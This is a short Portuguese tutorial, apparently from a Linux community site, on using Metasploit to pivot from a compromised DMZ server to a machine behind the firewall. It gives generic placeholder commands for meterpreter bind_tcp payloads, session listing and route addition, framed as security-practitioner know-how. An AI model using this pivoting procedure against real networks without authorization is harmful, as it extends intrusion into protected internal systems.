Metasploit: atacando um objetivo final a partir de uma máquina já comprometida

Publicado por Luiz Vieira em 04/02/2010

[ Hits: 9.043 ]

Blog: http://hackproofing.blogspot.com/

 


Metasploit: atacando um objetivo final a partir de uma máquina já comprometida



Algumas vezes, ao realizar um ataque, é necessário tornar vulneráveis várias máquinas até chegarmos ao nosso objetivo final. E uma das questões mais comuns nestas situações é: como é possível atacar uma máquina a partir de outra a qual já tenho acesso?

Vejamos um exemplo:
Linux: Metasploit: atacando um objetivo final a partir de uma máquina já comprometida
Como podemos ver na imagem acima, um atacante pode ganhar acesso a algum servidor que se encontra na DMZ (zona desmilitarizada) e a partir dali atacar outras máquinas que se encontrem além do firewall. Para isso é possível utilizar o framework Metasploit, o qual será muito útil.

O primeiro passo obviamente é encontrar uma vulnerabilidade no servidor que se encontra na DMZ e explorá-la usando como payload o meterpreter. No terminal do Metasploit digitamos:

use [exploit que ataca a vulnerabilidade encontrada]
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST [ip_host_dmz]
exploit-que-ataca-a-vulnerabilidade-encontrada


Agora precisamos saber o ID da sessão, para isso digitamos o seguinte no terminal do meterpreter:

sessions -l

O seguinte passo é criar uma rota até a máquina que é nosso objetivo final, indicando seu IP, a máscara e o ID de sessão que obtivemos no passo anterior:

route add [ip_maquina_objetivo] [Máscara de rede] [ID-Sessão]

Por último, realizamos o ataque à máquina objetivo, de forma normal, como se faria em qualquer outro caso, quer dizer, buscando a vulnerabilidade e aplicando o respectivo exploit. A diferença é que devemos dizer ao Metasploit que deve passar pelo PC que já temos acesso:

use [exploit_necessário]
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST [máquina_objetivo]
exploit


Desta forma podemos realizar um "bypass" usando o Metasploit, algo muito útil para todos os interessados na área de segurança da informação.

Outras dicas deste autor

Lista de Livros de Segurança

Palestra How Stuff Works: Exploits

Vídeos da palestra sobre Forense Computacional

Script Ubuntu Perfeito para Ubuntu 9.04 Jaunty Jackalope

Aplicações WEB vulneráveis para testes práticos

Leitura recomendada

OCS Inventory no CentOS 6.5 - Para inventário de rede

Comunidade de relacionamentos para usuários Debian

Fim da janela de notificação de dispositivos no KDE3

Erro ao instalar Fedora 17 usando Kickstart por PXE e com IP fixo [Resolvido]

Protocolo DLNA no Ubuntu - Solução para compartilhamento de arquivos entre vários dispositivos

  

Comentários

Nenhum comentário foi encontrado.



Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts